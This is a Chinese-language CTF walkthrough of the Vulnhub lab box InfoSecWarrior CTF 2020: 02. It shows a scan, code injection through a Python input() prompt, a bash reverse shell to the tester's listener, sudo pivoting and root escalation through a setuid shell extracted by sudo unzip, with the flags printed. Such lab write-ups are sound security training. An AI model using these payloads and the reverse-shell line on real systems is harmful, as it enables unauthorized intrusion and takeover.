Vulnhub之InfoSecWarriorBox 2靶機詳細測試過程
阿新 • • 發佈:2022-12-01
InfoSecWarriorBox 2
作者: jason_huawen
靶機基本資訊
名稱:InfoSecWarrior CTF 2020: 02
地址:
https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-02,447/
提示:Enumerate Enumerate and Enumerate is the motto to solve this box.
識別目標主機IP地址
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2] └─$ sudo netdiscover -i eth1 Currently scanning: 192.168.203.0/16 | Screen View: Unique Hosts 5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.100 08:00:27:f3:da:85 2 120 PCS Systemtechnik GmbH 192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor 192.168.56.245 08:00:27:f7:e2:30 2 120 PCS Systemtechnik GmbH
利用Kali Linux自帶的netdiscover工具識別目標主機的IP地址為192.168.56.245
NMAP掃描
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.245 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-01 04:44 EST Nmap scan report for bogon (192.168.56.245) Host is up (0.000076s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 89:f2:1b:40:c4:0c:3c:79:39:73:9d:fc:cc:ab:2b:0a (RSA) | 256 05:db:cf:29:90:f6:e4:3f:4f:74:c9:d2:57:81:6e:ff (ECDSA) |_ 256 9a:7d:f5:dd:90:51:b2:eb:3c:33:36:9f:25:0e:8c:21 (ED25519) 56563/tcp open unknown | fingerprint-strings: | GenericLines: | Welcome to | ____ __ __ _ | ___/ ___| ___ __\x20\x20 / /_ _ _ __ _ __(_) ___ _ __ | \x20/ _ / __\x20\x20/\x20/ / _` | '__| '__| |/ _ \| '__| | |__) | __/ (__ \x20V V / (_| | | | | | | (_) | | | |___|_| |_|_| ___/____/ ___|___| _/_/ __,_|_| |_| |_|___/|_| | Please input number of ping packet you want to send??: Traceback (most recent call last): | File "./script.py", line 18, in <module> | int(input(' Please input number of ping packet you want to send??: ')) | File "<string>", line 0 | SyntaxError: unexpected EOF while parsing | NULL: | Welcome to | ____ __ __ _ | ___/ ___| ___ __\x20\x20 / /_ _ _ __ _ __(_) ___ _ __ | \x20/ _ / __\x20\x20/\x20/ / _` | '__| '__| |/ _ \| '__| | |__) | __/ (__ \x20V V / (_| | | | | | | (_) | | | |___|_| |_|_| ___/____/ ___|___| _/_/ __,_|_| |_| |_|___/|_| |_ Please input number of ping packet you want to send??: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port56563-TCP:V=7.92%I=7%D=12/1%Time=63887772%P=x86_64-pc-linux-gnu%r(N SF:ULL,216,"Welcome\x20to\x20\r\n\x20\r\n\r\n\x20\x20___\x20\x20\x20\x20\x SF:20\x20\x20\x20__\x20\x20\x20\x20\x20\x20____\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20__\x20\x20\x20\x20\x20\x20\x20\x20__\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\r\n\x20\|_\x20_\|_\x20__\x20\x20/\x20_\|\x20___/\x20___\|\ SF:x20\x20___\x20\x20__\\\x20\\\x20\x20\x20\x20\x20\x20/\x20/_\x20_\x20_\x SF:20__\x20_\x20__\(_\)\x20___\x20\x20_\x20__\x20\r\n\x20\x20\|\x20\|\|\x2 SF:0'_\x20\\\|\x20\|_\x20/\x20_\x20\\___\x20\\\x20/\x20_\x20\\/\x20__\\\x2 SF:0\\\x20/\\\x20/\x20/\x20_`\x20\|\x20'__\|\x20'__\|\x20\|/\x20_\x20\\\|\ SF:x20'__\|\r\n\x20\x20\|\x20\|\|\x20\|\x20\|\x20\|\x20\x20_\|\x20\(_\)\x2 SF:0\|__\)\x20\|\x20\x20__/\x20\(__\x20\\\x20V\x20\x20V\x20/\x20\(_\|\x20\ SF:|\x20\|\x20\x20\|\x20\|\x20\x20\|\x20\|\x20\(_\)\x20\|\x20\|\x20\x20\x2 SF:0\r\n\x20\|___\|_\|\x20\|_\|_\|\x20\x20\\___/____/\x20\\___\|\\___\|\x2 SF:0\\_/\\_/\x20\\__,_\|_\|\x20\x20\|_\|\x20\x20\|_\|\\___/\|_\|\x20\x20\x SF:20\r\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\r\n\r\n\r\n\x20Please\x20input\x20number\x20of\x20pi SF:ng\x20packet\x20you\x20want\x20to\x20send\?\?:\x20")%r(GenericLines,30B SF:,"Welcome\x20to\x20\r\n\x20\r\n\r\n\x20\x20___\x20\x20\x20\x20\x20\x20\ SF:x20\x20__\x20\x20\x20\x20\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20__\x20\x20\x20\x20\x20\x20\x20\x20__\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\r\n\x20\|_\x20_\|_\x20__\x20\x20/\x20_\|\x20___/\x20___\|\x20\x20 SF:___\x20\x20__\\\x20\\\x20\x20\x20\x20\x20\x20/\x20/_\x20_\x20_\x20__\x2 SF:0_\x20__\(_\)\x20___\x20\x20_\x20__\x20\r\n\x20\x20\|\x20\|\|\x20'_\x20 SF:\\\|\x20\|_\x20/\x20_\x20\\___\x20\\\x20/\x20_\x20\\/\x20__\\\x20\\\x20 SF:/\\\x20/\x20/\x20_`\x20\|\x20'__\|\x20'__\|\x20\|/\x20_\x20\\\|\x20'__\ SF:|\r\n\x20\x20\|\x20\|\|\x20\|\x20\|\x20\|\x20\x20_\|\x20\(_\)\x20\|__\) SF:\x20\|\x20\x20__/\x20\(__\x20\\\x20V\x20\x20V\x20/\x20\(_\|\x20\|\x20\| SF:\x20\x20\|\x20\|\x20\x20\|\x20\|\x20\(_\)\x20\|\x20\|\x20\x20\x20\r\n\x SF:20\|___\|_\|\x20\|_\|_\|\x20\x20\\___/____/\x20\\___\|\\___\|\x20\\_/\\ SF:_/\x20\\__,_\|_\|\x20\x20\|_\|\x20\x20\|_\|\\___/\|_\|\x20\x20\x20\r\n\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\r\n\r\n\r\n\x20Please\x20input\x20number\x20of\x20ping\x20p SF:acket\x20you\x20want\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recen SF:t\x20call\x20last\):\r\n\x20\x20File\x20\"\./script\.py\",\x20line\x201 SF:8,\x20in\x20<module>\r\n\x20\x20\x20\x20num\x20=\x20int\(input\('\x20Pl SF:ease\x20input\x20number\x20of\x20ping\x20packet\x20you\x20want\x20to\x2 SF:0send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<string>\",\x20line\x200\r\n\x SF:20\x20\x20\x20\r\n\x20\x20\x20\x20\^\r\nSyntaxError:\x20unexpected\x20E SF:OF\x20while\x20parsing\r\n"); MAC Address: 08:00:27:F7:E2:30 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds
NMAP掃描結果表明目標主機有2個開放埠22(SSH)、56563(未知)。
獲取Shell
由於目標主機SSH服務沒有可利用的漏洞。接下來主要圍繞56563埠,用瀏覽器訪問該埠,返回:
Welcome to ___ __ ____ __ __ _ |_ _|_ __ / _| ___/ ___| ___ __\ \ / /_ _ _ __ _ __(_) ___ _ __ | || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__| | || | | | _| (_) |__) | __/ (__ \ V V / (_| | | | | | | (_) | | |___|_| |_|_| \___/____/ \___|\___| \_/\_/ \__,_|_| |_| |_|\___/|_| Please input number of ping packet you want to send??: Traceback (most recent call last): File "./script.py", line 18, in <module> num = int(input(' Please input number of ping packet you want to send??: ')) File "<string>", line 1, in <module> NameError: name 'GET' is not defined
似乎是執行script.py指令碼,也許不是web服務,用telnet連線該埠:
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ telnet 192.168.56.245 56563
Trying 192.168.56.245...
Connected to 192.168.56.245.
Escape character is '^]'.
Welcome to
___ __ ____ __ __ _
|_ _|_ __ / _| ___/ ___| ___ __\ \ / /_ _ _ __ _ __(_) ___ _ __
| || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
| || | | | _| (_) |__) | __/ (__ \ V V / (_| | | | | | | (_) | |
|___|_| |_|_| \___/____/ \___|\___| \_/\_/ \__,_|_| |_| |_|\___/|_|
Please input number of ping packet you want to send??: 1
ping target (CTF.InfoSecWarrior)...
64 bytes from 127.0.0.1: icmp_seq=1 ttl=31337 time=0.028 ms
Connection closed by foreign host.
後臺應該在執行 ping -c {num} 127.0.0.1命令:
可以動態載入__import__('os')__.system("/bin/bash"),這樣就可以拿到shell。_
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ telnet 192.168.56.245 56563
Trying 192.168.56.245...
Connected to 192.168.56.245.
Escape character is '^]'.
Welcome to
___ __ ____ __ __ _
|_ _|_ __ / _| ___/ ___| ___ __\ \ / /_ _ _ __ _ __(_) ___ _ __
| || '_ \| |_ / _ \___ \ / _ \/ __\ \ /\ / / _` | '__| '__| |/ _ \| '__|
| || | | | _| (_) |__) | __/ (__ \ V V / (_| | | | | | | (_) | |
|___|_| |_|_| \___/____/ \___|\___| \_/\_/ \__,_|_| |_| |_|\___/|_|
Please input number of ping packet you want to send??: __import__('os').system("/bin/bash")
bash: cannot set terminal process group (15800): Inappropriate ioctl for device
bash: no job control in this shell
bla1@ck04:~$ bla1@ck04:~$ id
uid=1001(bla1) gid=1001(bla1) groups=1001(bla1)
bla1@ck04:~$ bla1@ck04:~$
bla1@ck04:~$ cat bla2-note
cat bla2-note
My group password is czNjcjN0
I encoded my gpasswd :-P
bla1@ck04:~$
bla1@ck04:~$ id
id
uid=1001(bla1) gid=1001(bla1) groups=1001(bla1)
bla1@ck04:~$
bla1@ck04:~$ cd /home
cd /home
bla1@ck04:/home$
bla1@ck04:/home$ ls
ls
bla bla1 bla2 ck04
bla1@ck04:/home$
bla2-note檔案雖然有個密碼但是是組密碼,不知如何利用。嘗試登入ck04使用者:
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ ssh [email protected]
The authenticity of host '192.168.56.245 (192.168.56.245)' can't be established.
ED25519 key fingerprint is SHA256:1ZORKwkYqKUIbnD6szqzCNxwimK6Qi1HbDH7ze1nhWE.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:34: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.245' (ED25519) to the list of known hosts.
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
░░░░░░░░▄██████▄ Do this and I will give you a Hint
░░░░░░░█▀▀▀██▀▀▀▄
░░░░░░░█▄▄▄██▄▄▄█ Laugh uncontrollably for about 3 minutes
░░░░░░░▀█████████ then suddenly stop and look suspiciously
░░░░░░░░▀███▄███▀░░ at everyone who looks at you.
░░░░░░░░░▀████▀░░░░░ Or
░░░░░░░▄████████▄░░░░ Enumerate Hostname and Distro's codename of this box
░░░░░░████████████░░░░ And try to get Secure SHell
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
PS: For Newbie refer this website to know more : google.co.in
[email protected]'s password:
作者提示ck04的密碼跟hostname以及codename有關係
bla1@ck04:/home/ck04$ uname -a
uname -a
Linux ck04 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$
codename是bionic。
用bionic作為密碼可以正常登入,但是執行一個命令後SSH就自動斷了。
bla1@ck04:/home/ck04$ cat shell
cat shell
#!/bin/sh
cat /home/bla/user.txt
read ip
echo `$ip` command not found
bla1@ck04:/home/ck04$
bla1@ck04:/home/ck04$
發現輸入/bin/bash,可以轉為shell
┌──(kali㉿kali)-[~/Vulnhub/InfoSecWarriorBox2]
└─$ ssh [email protected]
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
░░░░░░░░▄██████▄ Do this and I will give you a Hint
░░░░░░░█▀▀▀██▀▀▀▄
░░░░░░░█▄▄▄██▄▄▄█ Laugh uncontrollably for about 3 minutes
░░░░░░░▀█████████ then suddenly stop and look suspiciously
░░░░░░░░▀███▄███▀░░ at everyone who looks at you.
░░░░░░░░░▀████▀░░░░░ Or
░░░░░░░▄████████▄░░░░ Enumerate Hostname and Distro's codename of this box
░░░░░░████████████░░░░ And try to get Secure SHell
(-(-_(-_-)_-)-) (-(-_(-_-)_-)-) (-(-_(-_-)_-)-)
PS: For Newbie refer this website to know more : google.co.in
[email protected]'s password:
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
You found user flag = 9b36b2e89df94bc458d629499d38cf86
Want Hint/Help for root message me @CyberKnight00
\__/ \__/ \__/ \__/ \__/ \__/ \__/
(oo) (o-) (@@) (xx) (--) ( ) (OO)
//||\\ //||\\ //||\\ //||\\ //||\\ //||\\ //||\\
bug bug bug dead bug blind bug after
winking hangover bug sleeping bug seeing a
female
bug
/bin/bash
ck04@ck04:~$
但這個shell不能改變目錄,可以spawn另一個shell
ck04@ck04:/home$ which nc
ck04@ck04:/home$ bash -i >& /dev/tcp/192.168.56.206/5555 0>&1
┌──(kali㉿kali)-[~/Vulnhub/Darkhole]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.245] 34240
ck04@ck04:/home$
這個shell可以正常執行命令。
ck04@ck04:~$ sudo -l
sudo -l
Matching Defaults entries for ck04 on ck04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck04 may run the following commands on ck04:
(bla) NOPASSWD: ALL
ck04@ck04:~$
發現ck04可以轉變為bla使用者
ck04@ck04:~$ sudo -l
sudo -l
Matching Defaults entries for ck04 on ck04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ck04 may run the following commands on ck04:
(bla) NOPASSWD: ALL
ck04@ck04:~$ sudo -u bla /bin/bash
sudo -u bla /bin/bash
id
uid=1000(bla) gid=1000(bla) groups=1000(bla),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bla@ck04:~$ ls
ls
Desktop Downloads Pictures shell Videos
Documents Music Public Templates
bla@ck04:~$ cd /home
cd /home
bla@ck04:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Jan 28 2020 .
drwxr-xr-x 25 root root 4.0K Dec 1 15:05 ..
drwxr-x--- 16 bla bla 4.0K Feb 14 2020 bla
drwxr-x--- 3 bla1 bla1 4.0K Feb 14 2020 bla1
drwxrwx--- 3 bla2 bla2 4.0K Feb 14 2020 bla2
drwxr-xr-x 15 ck04 ck04 4.0K Feb 14 2020 ck04
bla@ck04:/home$ cd bla
cd bla
bla@ck04:/home/bla$ ls -alh
ls -alh
total 96K
drwxr-x--- 16 bla bla 4.0K Feb 14 2020 .
drwxr-xr-x 6 root root 4.0K Jan 28 2020 ..
lrwxrwxrwx 1 root root 9 Jan 27 2020 .bash_history -> /dev/null
-rw-r--r-- 1 bla bla 220 Jan 27 2020 .bash_logout
-rw-r--r-- 1 bla bla 3.7K Jan 27 2020 .bashrc
drwx------ 15 bla bla 4.0K Feb 13 2020 .cache
drwx------ 14 bla bla 4.0K Feb 13 2020 .config
drwx------ 3 root root 4.0K Jan 28 2020 .dbus
drwxr-xr-x 2 bla bla 4.0K Feb 13 2020 Desktop
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Documents
drwxr-xr-x 2 bla bla 4.0K Feb 13 2020 Downloads
drwx------ 3 bla bla 4.0K Jan 27 2020 .gnupg
-rw-rw-r-- 1 bla bla 0 Feb 13 2020 .hushlogin
-rw------- 1 bla bla 12K Feb 13 2020 .ICEauthority
drwx------ 3 bla bla 4.0K Jan 27 2020 .local
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Music
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Pictures
-rw-r--r-- 1 bla bla 807 Jan 27 2020 .profile
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Public
-rw-r--r-- 1 bla bla 66 Jan 27 2020 .selected_editor
drwx------ 2 bla bla 4.0K Feb 13 2020 .ssh
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Templates
-rw-rw---- 1 bla bla 1.2K Feb 12 2020 user.txt
drwxr-xr-x 2 bla bla 4.0K Jan 27 2020 Videos
bla@ck04:/home/bla$ cat user.txt
cat user.txt
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
You found user flag = 9b36b2e89df94bc458d629499d38cf86
Want Hint/Help for root message me @CyberKnight00
\__/ \__/ \__/ \__/ \__/ \__/ \__/
(oo) (o-) (@@) (xx) (--) ( ) (OO)
//||\\ //||\\ //||\\ //||\\ //||\\ //||\\ //||\\
bug bug bug dead bug blind bug after
winking hangover bug sleeping bug seeing a
female
bug
bla@ck04:/home/bla$
提權
bla@ck04:/home/bla$ sudo -l
sudo -l
Matching Defaults entries for bla on ck04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bla may run the following commands on ck04:
(root) NOPASSWD: /usr/bin/virtualbox, /usr/bin/unzip
(bla) NOPASSWD: ALL
bla@ck04:/home/bla$ sudo /usr/bin/unzip -K shell.zip
sudo /usr/bin/unzip -K shell.zip
unzip: cannot find or open shell.zip, shell.zip.zip or shell.zip.ZIP.
bla@ck04:/home/bla$ cp /bin/sh .
cp /bin/sh .
bla@ck04:/home/bla$ chmod +s sh
chmod +s sh
bla@ck04:/home/bla$ zip shell.zip sh
zip shell.zip sh
adding: sh (deflated 51%)
bla@ck04:/home/bla$ sudo /usr/bin/unzip -K shell.zip
sudo /usr/bin/unzip -K shell.zip
Archive: shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
y
inflating: sh
bla@ck04:/home/bla$ ./sh -p
./sh -p
# cd /root
cd /root
# ls -alh
ls -alh
total 40K
drwx------ 7 root root 4.0K Feb 14 2020 .
drwxr-xr-x 25 root root 4.0K Dec 1 15:05 ..
lrwxrwxrwx 1 root root 9 Jan 27 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Jan 27 2020 .cache
drwx------ 3 root root 4.0K Jan 28 2020 .config
drwx------ 3 root root 4.0K Jan 27 2020 .gnupg
-rw-r--r-- 1 root root 0 Feb 13 2020 .hushlogin
drwxr-xr-x 3 root root 4.0K Jan 27 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
---------- 1 root root 850 Feb 14 2020 proof.txt
drwx------ 2 root root 4.0K Feb 13 2020 .ssh
# cat proof.txt
cat proof.txt
_________ ___. ____ __. .__ .__ __ _______ _____
\_ ___ \___.__.\_ |__ ___________| |/ _| ____ |__| ____ | |___/ |_ \ _ \ / | |
/ \ \< | | | __ \_/ __ \_ __ \ < / \| |/ ___\| | \ __\ / /_\ \ / | |_
\ \___\___ | | \_\ \ ___/| | \/ | \| | \ / /_/ > Y \ | \ \_/ \/ ^ /
\______ / ____| |___ /\___ >__| |____|__ \___| /__\___ /|___| /__| \_____ /\____ |
\/\/ \/ \/ \/ \/ /_____/ \/ \/ |__|
flag = 1876056353cb2e6253fd0ce121ef1b3f
This flag is a proof that you got the root shell.
You have to submit your report contaning all steps you take to got root shell.
Send your report at our e-mail address : [email protected] & [email protected]
#
繼續sudo -l, 發現unzip可以用來提權,參照GTFOBINS網站的方法進行提權:
cp /bin/sh .
chmod +s sh
zip shell.zip sh
sudo unzip -K shell.zip
./sh -p
成功得到root shell,並拿到root flag.